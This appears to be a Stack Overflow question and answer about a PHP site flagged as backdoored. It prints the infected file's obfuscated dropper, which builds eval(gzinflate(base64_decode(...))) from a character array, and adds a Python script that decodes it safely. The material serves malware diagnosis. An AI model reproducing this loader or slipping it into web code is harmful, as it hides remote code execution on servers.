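PHP files infected with SiteLock-PHP-BACKDOOR-GENERIC-co.UNOFFICIAL

Time: 2014-09-10 12:10:48

Tags: php linux hosting malware virus

I tested my website for infection and found that 66 files are infected PHP files, but I really cannot trace any malicious code in these files, and I don't know how to remove the infection from them. Below is a screenshot of my scan ->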

enter image description here

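I checked all of these files for malicious code and compared them with an old backup, but found nothing suspicious. I googled a lot and searched Stack Overflow extensively, but nothing helped. Please help me figure out how to track down this virus code.

Here is the code of a single file: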

    <?php
    $md5 = "23423b2hj34j23b4hj23b4jk23bjb4bb34jb";
    $aa = array('l','z','v',"s",';',"a",'n',"4",'i',"6",'f',"$",'e',"(",'c',"d",")","o",'b',"t","g",'r',"_");
    $ba4 = create_function('$'.'v',$aa[12].$aa[2].$aa[5].$aa[0].$aa[13].$aa[20].$aa[1].$aa[8].$aa[6].$aa[10].$aa[0].$aa[5].$aa[19].$aa[12].$aa[13].$aa[18].$aa[5].$aa[3].$aa[12].$aa[9].$aa[7].$aa[22].$aa[15].$aa[12].$aa[14].$aa[17].$aa[15].$aa[12].$aa[13].$aa[11].$aa[2].$aa[16].$aa[16].$aa[16].$aa[4]);
    $ba4('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');
    ?>
    <?php include 'biComposer/start.php' ?>
    <!DOCTYPE html>
    <!--[if lt IE 7]>      <html class="no-js lt-ie9 lt-ie8 lt-ie7"> <![endif]-->
    <!--[if IE 7]>         <html class="no-js lt-ie9 lt-ie8"> <![endif]-->
    <!--[if IE 8]>         <html class="no-js lt-ie9"> <![endif]-->
    <!--[if gt IE 8]><!-->
    <html class="no-js"> <!--<![endif]-->
      <head>
        <title>Lorem Ipsum is simply dummy text </title>
        <meta name="description" content="" />
        <?php include_partial('meta') ?>
      </head>

      <body>

        <?php include_partial('header', array('caption' => 'about')) ?>

        <section class="main">
          <div class="content">
            <article>
              <h1>about us</h1>
              <h3>Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry's standard</h3>
              <p>
                Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry's standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.
              </p>
              <div class="txt-align-center" style="margin:40px 0;">
                <img src="images/land-acquisition.jpg" alt="">
              </div>
              <p>
               Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry's standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has


              </p>
              <div class="txt-align-center" style="margin:40px 0;">
                <img src="images/business-division.jpg" alt="" usemap="#Map">
                <map name="Map">
                  <area shape="rect" coords="46,100,200,158">
                  <area shape="rect" coords="224,100,380,158">
                  <area shape="rect" coords="405,100,555,158">
                  <area shape="rect" coords="582,101,732,159">
                </map>
              </div>
            </article>
          </div>
        </section>

        <?php include_partial('footer') ?>

      </body>

     <?php include_partial('js') ?>

    </html>

1 answer:

Answer 0: (score: 1)

So:

    $aa[12].$aa[2].$aa[5].$aa[0].$aa[13].$aa[20].$aa[1].$aa[8].$aa[6].$aa[10].$aa[0].$aa[5].$aa[19].$aa[12].$aa[13].$aa[18].$aa[5].$aa[3].$aa[12].$aa[9].$aa[7].$aa[22].$aa[15].$aa[12].$aa[14].$aa[17].$aa[15].$aa[12].$aa[13].$aa[11].$aa[2].$aa[16].$aa[16].$aa[16].$aa[4]

is actually

    eval(gzinflate(base64_decode($v)));

However, if we set $v to

    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

I get `data error` with PHP 5.2.5, and the same happens here: http://sandbox.onlinephpfunctions.com/code/f7fb8d6e35bede9f007b2d77ee87e30957825e0a
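
The decoding described in the answer can be done statically, so that nothing from the infected file is ever executed. The following is an added example in Python, not part of the original question or answer. The function names are chosen here, and the payload built by `make_sample` is constructed, because the page does not include the original one.

```python
import base64
import re
import zlib

# The two dropper lines from the infected file shown in the question.
ARRAY_SRC = r'''$aa = array('l','z','v',"s",';',"a",'n',"4",'i',"6",'f',"$",'e',"(",'c',"d",")","o",'b',"t","g",'r',"_");'''
CHAIN_SRC = "$aa[12].$aa[2].$aa[5].$aa[0].$aa[13].$aa[20].$aa[1].$aa[8].$aa[6].$aa[10].$aa[0].$aa[5].$aa[19].$aa[12].$aa[13].$aa[18].$aa[5].$aa[3].$aa[12].$aa[9].$aa[7].$aa[22].$aa[15].$aa[12].$aa[14].$aa[17].$aa[15].$aa[12].$aa[13].$aa[11].$aa[2].$aa[16].$aa[16].$aa[16].$aa[4]"

def parse_php_array(src):
    """Return the quoted string elements of a flat PHP array(...) literal."""
    body = src[src.index("(") + 1 : src.rindex(")")]
    return [m.group(2) for m in re.finditer(r"""(['"])(.*?)\1""", body)]

def resolve_chain(chain, table, var="aa"):
    """Replace each $var[n] in a '.'-joined chain with table[n] and join them."""
    idx = [int(n) for n in re.findall(r"\$%s\[(\d+)\]" % re.escape(var), chain)]
    return "".join(table[i] for i in idx)

def inflate_stage(b64_text):
    """Undo base64_decode + gzinflate (raw DEFLATE) without eval.

    Returns (text, None) on success or (None, reason) when the blob is
    damaged, the case PHP reports as 'data error'.
    """
    try:
        raw = base64.b64decode("".join(b64_text.split()), validate=True)
        return zlib.decompress(raw, -15).decode("utf-8", "replace"), None
    except (ValueError, zlib.error) as exc:
        return None, str(exc)

def make_sample():
    """Constructed, harmless stand-in payload in the same encoding."""
    c = zlib.compressobj(9, zlib.DEFLATED, -15)  # -15 selects raw DEFLATE
    data = c.compress(b"echo 'constructed sample';") + c.flush()
    return base64.b64encode(data).decode()

if __name__ == "__main__":
    table = parse_php_array(ARRAY_SRC)
    print("hidden function body:", resolve_chain(CHAIN_SRC, table))
    print("second stage:", inflate_stage(make_sample()))
    print("damaged blob:", inflate_stage("////"))
```

A `(None, reason)` result means the argument string is incomplete or altered, so the second stage cannot be recovered from that copy of the file.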